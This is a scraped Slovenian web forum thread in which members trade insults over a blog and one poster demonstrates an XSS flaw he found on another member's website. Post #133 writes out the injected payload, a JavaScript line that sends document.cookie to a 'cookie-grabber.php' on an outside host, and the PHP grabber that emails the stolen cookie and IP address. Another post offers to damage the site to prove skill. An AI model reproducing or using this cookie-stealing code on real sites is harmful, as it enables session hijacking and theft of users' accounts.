mactron

Statistika

Pridružen/a:
01 dec 2006, 23:34
Zadnjič aktiven:
Prispevki:
1846 | Vsi prispevki
Teme:
84 | Vse teme
72
13
1
#16

a se nisi ti ze pred casom poslovil od foruma?




Zdaj si pa še šef na forumu al kaj ?



@had - Blog lahko piše vsaka pismena oseba, ki je starejša od 10let, zato nisi odkril tople vode in bodi malo man naduvan. Vsi tukaj na tem forumu, bi lahko vsak dan pisali blog, ampak za tistih 300 € je to zguba časa.



Nisi najpametnejši veš in malo se spusti na realna tla.


všeč(0) ni všeč(0) spam(0)
#9

Had je zakon.... on je slovenski John Chow


všeč(0) ni všeč(0) spam(0)
#1

aj to u žirovnc ane ?


všeč(0) ni všeč(0) spam(0)
#141

vem da si ga tam našel, ampak iz tm sem potegnil samo script.. no kakor praviš je potem vse vredu. Tudi prav.. se sedaj ponovno umikam iz foruma.



Pozdrav!


všeč(0) ni všeč(0) spam(0)
#139

ha.ckers.org ? nevem točno kaj si hotel s tem povedati ? Kode nisem le preprisal le coockie grab je na njihovem srverju. Ja ne bom toliko neumen pa se igračkal preko svojega srverja ?



Sicer pa ni to samo ena napaka, sem jih našel precej, če želiš pa lahko še malo pokukam okoli Apacha in tega sranja ?!?

Sicer ti bo pa had pomagal pofixat, če se boš odločil, ko ima ravno tako znanje!



P.S. Ne podcenjuj XSS attacka, vrjemi mi se lahko naredi kar precejšna škoda z njem, čeprav boljše kak rfi, rfd, lfi!



Sicer pa kaj ti bi pametoval itq sem samo prepisal kodo...



-lp-


všeč(0) ni všeč(0) spam(0)
všeč(0) ni všeč(0) spam(0)
#133

No pa še kratek postopek.

<BODY ONLOAD="document.write('<script src=http://enurl.com/xss.js></script>')"> sem vpisal v tvoj url... enurl.com sem zamenaj potko, do hostinga, kjer je v xss.js nekaj vrstična koda za zajem coockia iz tvojega browserja.



Dela tudi tale koda:

location.href='http://enurl.com/cookie-grabber.php?cookie='+escape(document.cookie), kjer je vcookie-grabber.php naslednja koda:



<?

$kuks = $GET['cookie'];

$ip = getenv("REMOTE
ADDR");

$msg = "Cookie: $cookie\nIP Address: $ip";

$sub = "cookie";

mail("bla@bla.com", $subject, $msg);

header ("location: http://mmmm.com/neki.jpg");

?>



P.S. Tok sem bil, do tebe dober, da sem skril javo in url in ta sranja.. Da ne boš čez kak dan down


všeč(0) ni všeč(0) spam(0)
#132

Vini tiste strani niti niso pol profisionalne in so bile narejene čez noč, za Slovenski trg. Ne morem biti na vseh koncih in ja priznam napako! Nikoli nisem rekel, da ne delam napak, napak je še lahko mnogo več. Sicer pa navadni user ne gleda sourc kode, heker pa ravno to ! Imam prav ?



Ampak ta napaka niti malo ni tako kritična kot, tvoja ko ti lahko s 5 vrsticami PHP kode ali jave ukradem cookie in si ga namestim.



Nikjer nisem zasledil, da so hekerji napadli preko a hrefa, sem pa že slišal, da so na srver namestili c99... tega je ko dreka!



Da potrdim svoje znanje ti laho naredim nekaj škode na strani ? Si za ?


všeč(0) ni všeč(0) spam(0)
#130

lahko pripomam en banaln primer iz Lila kr javno ?


všeč(0) ni všeč(0) spam(0)